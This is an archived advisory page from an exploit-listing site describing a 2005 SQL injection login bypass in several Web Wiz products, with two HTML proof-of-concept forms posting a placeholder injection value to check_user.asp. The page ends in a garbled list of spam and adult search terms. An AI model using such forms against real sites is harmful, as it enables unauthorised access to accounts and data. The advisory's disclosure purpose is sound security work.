about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Web Wiz Multiple Products SQL Injection Vulnerability


Title Web Wiz Multiple Products SQL Injection Vulnerability
Published 2005-12-30-12:00AM
Updated 2005-12-30-04:27PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovered by DevilBox of KAPDA.
Vulnerable  Web Wiz Site News Access 97 3.0 6
Web Wiz Site News Access 2000 3.0 6
Web Wiz Polls Access 97 3.0 6
Web Wiz Polls Access 2000 3.0 6
Web Wiz Journal Access 97 1.0
Web Wiz Journal Access 2000 1.0
Web Wiz Database Login Access 97 1.71
Web Wiz Database Login Access 2000 1.71
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept example is available:
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 20:52:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mambo Remo 23448 sexy movie hen walpapers jagex.com bbwsexmovi wWW.Arab.j Cineplex grosse poi womanmanse english bl Burning Bo /var/lib/s www.Fotolo Crack+Data memet oracle e-b t319t www89.com free sex f hotpicture invision 2 Www.phoner nucleus Hotpoto iliyana.ht www.gogirl teenagepor 200 /compo sex arab x /search/ex Movie clip www.assfuc CMS is Fre Nude teema Indiansex4 EQdkp+1.3. SEXSE mambo Remo Indiansex4 SEXSE free vide mambo Remo sexape.com allinurl: Passport picz video porn jesus stil